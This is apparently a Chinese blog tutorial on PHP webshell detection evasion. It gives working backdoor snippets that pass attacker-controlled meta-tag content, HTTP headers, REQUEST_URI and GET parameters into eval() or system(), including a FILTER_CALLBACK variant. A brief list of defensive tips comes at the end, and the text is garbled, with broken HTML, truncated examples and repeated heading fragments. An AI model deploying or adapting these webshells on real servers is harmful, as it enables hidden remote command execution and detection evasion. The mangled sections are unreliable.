PHP Webshell免杀技术：控制传入内容的方法详解<\/h1>

前言<\/h2>
在PHP Webshell的研究中，如何安全地控制外部传入参数是一个关键问题。本文将详细介绍几种控制传入内容的技术方法，重点研究如何实现参数的安全传入。<\/p>

基础全局变量<\/h2>

PHP提供了多种获取外部传入数据的全局变量：<\/p>

$_GET<\/strong>：<\/p>

用于收集通过URL查询字符串传递的数据<\/li>
示例：example.com\/page.php?name=John&age=25<\/code>中，$_GET['name']<\/code>为"John"<\/li> <\/ul> <\/li>
$_POST<\/strong>：<\/p> 用于收集通过HTTP POST方法发送的数据<\/li> 常用于表单提交，如$_POST['username']<\/code><\/li> <\/ul> <\/li> $_COOKIE<\/strong>：<\/p> 用于访问客户端存储的cookie数据<\/li> 示例：$_COOKIE['user']<\/code>获取cookie值<\/li> <\/ul> <\/li> $_REQUEST<\/strong>：<\/p> 合并了$_GET、$<\/span>_POST和$_COOKIE中的数据<\/li> 若GET和POST有相同参数，优先返回POST值<\/li> <\/ul> <\/li> $_SERVER<\/strong>：<\/p> 包含服务器和执行环境信息<\/li> 重要元素：$_SERVER['REQUEST_METHOD']<\/code>、$_SERVER['HTTP_USER_AGENT']<\/code><\/li> <\/ul> <\/li> $_FILES<\/strong>：<\/p> 处理通过HTTP POST上传的文件信息<\/li> <\/ul> <\/li> $GLOBALS<\/strong>：<\/p> 超级全局数组，包含所有全局变量<\/li> <\/ul> <\/li> <\/ol> 高级参数控制技术<\/h2> 1. 利用get_meta_tags函数<\/h3> 分析<\/strong>： get_meta_tags<\/code>函数从一个文件中提取所有meta标签的content属性，返回数组。<\/p> Webshell示例<\/strong>：<\/p> \/\/ 1.html内容如下： <\/span><\/span><\/span>\/\/ <meta name="cmd" content="system('whoami');" \/> <\/span><\/span><\/span><\/span> <\/span><\/span>$meta =<\/span> get_meta_tags<\/span>('1.html'<\/span>); <\/span><\/span>eval<\/span>($meta['cmd'<\/span>]); <\/span><\/span><\/code><\/pre>2. 使用getallheaders函数<\/h3> 分析<\/strong>： getallheaders<\/code>获取全部HTTP请求头信息，返回关联数组。<\/p> Webshell示例<\/strong>：<\/p> $headers =<\/span> getallheaders<\/span>(); <\/span><\/span>eval<\/span>($headers['X-Cmd'<\/span>]); \/\/ 通过X-Cmd头传入命令 <\/span><\/span><\/span><\/code><\/pre>3. 利用get_defined_vars函数<\/h3> 分析<\/strong>： get_defined_vars<\/code>返回所有已定义变量组成的数组，包含$_SERVER等信息。<\/p> Webshell示例<\/strong>：<\/p> $vars =<\/span> get_defined_vars<\/span>(); <\/span><\/span>\/\/ 通过控制文件名或URI参数传入命令 <\/span><\/span><\/span><\/span>eval<\/span>($vars['_SERVER'<\/span>]['REQUEST_URI'<\/span>]); <\/span><\/span><\/code><\/pre>4. 使用filter_input函数<\/h3> 分析<\/strong>： filter_input<\/code>通过名称获取特定外部变量，并可应用过滤器处理。<\/p> 参数类型<\/strong>：<\/p> INPUT_GET, INPUT_POST, INPUT_COOKIE, INPUT_SERVER或INPUT_ENV<\/li> <\/ul> Webshell示例<\/strong>：<\/p> \/\/ 通过URL参数传入：?cmd=whoami <\/span><\/span><\/span><\/span>$cmd =<\/span> filter_input<\/span>(INPUT_GET<\/span>, 'cmd'<\/span>, FILTER_UNSAFE_RAW<\/span>); <\/span><\/span>system<\/span>($cmd); <\/span><\/span> <\/span><\/span>\/\/ 使用自定义回调函数 <\/span><\/span><\/span><\/span>function<\/span> evil<\/span>($value) { <\/span><\/span> system<\/span>($value); <\/span><\/span> return<\/span> $value; <\/span><\/span>} <\/span><\/span>filter_input<\/span>(INPUT_GET<\/span>, 'cmd'<\/span>, FILTER_CALLBACK<\/span>, ['options'<\/span> =><\/span> 'evil'<\/span>]); <\/span><\/span><\/code><\/pre>高级技巧与注意事项<\/h2> $_SERVER的深入利用<\/strong>： $_SERVER['HTTP_ACCEPT']<\/code>等HTTP头字段可作为参数传入点<\/li> 示例：`eval(<\/li> <\/ul> <\/li> <\/ol> \[string1['HTTP_ACCEPT'])` 2. **文件名控制**： - 通过`$_SERVER['SCRIPT_NAME']`或`$_SERVER['REQUEST_URI']`获取文件名 - 在Webshell检测中通常忽略文件名检查 3. **过滤器的高级应用**： - 使用`FILTER_CALLBACK`设置自定义处理方法 - 通过options数组配置回调函数 4. **动态变量执行**： - 结合` \]<\/span><\/p> `语法实现动态变量名访问<\/p> 示例：`<\/li> <\/ul> \[dynamic_var`执行动态命令 ## 防御建议 1. 对所有外部输入进行严格过滤和验证 2. 禁用危险函数如`eval()`、`system()`等 3. 限制文件包含操作 4. 监控异常HTTP头字段 5. 定期更新Web应用防火墙规则通过深入理解这些参数控制技术，安全研究人员可以更好地评估Web应用的安全性，同时开发人员也能更有效地防范潜在威胁。\]<\/span><\/p>

PHP Webshell免杀技术：控制传入内容的方法详解<\/h1>

前言<\/h2> 在PHP Webshell的研究中，如何安全地控制外部传入参数是一个关键问题。本文将详细介绍几种控制传入内容的技术方法，重点研究如何实现参数的安全传入。<\/p>

高级参数控制技术<\/h2>

前言<\/h2>
在PHP Webshell的研究中，如何安全地控制外部传入参数是一个关键问题。本文将详细介绍几种控制传入内容的技术方法，重点研究如何实现参数的安全传入。<\/p>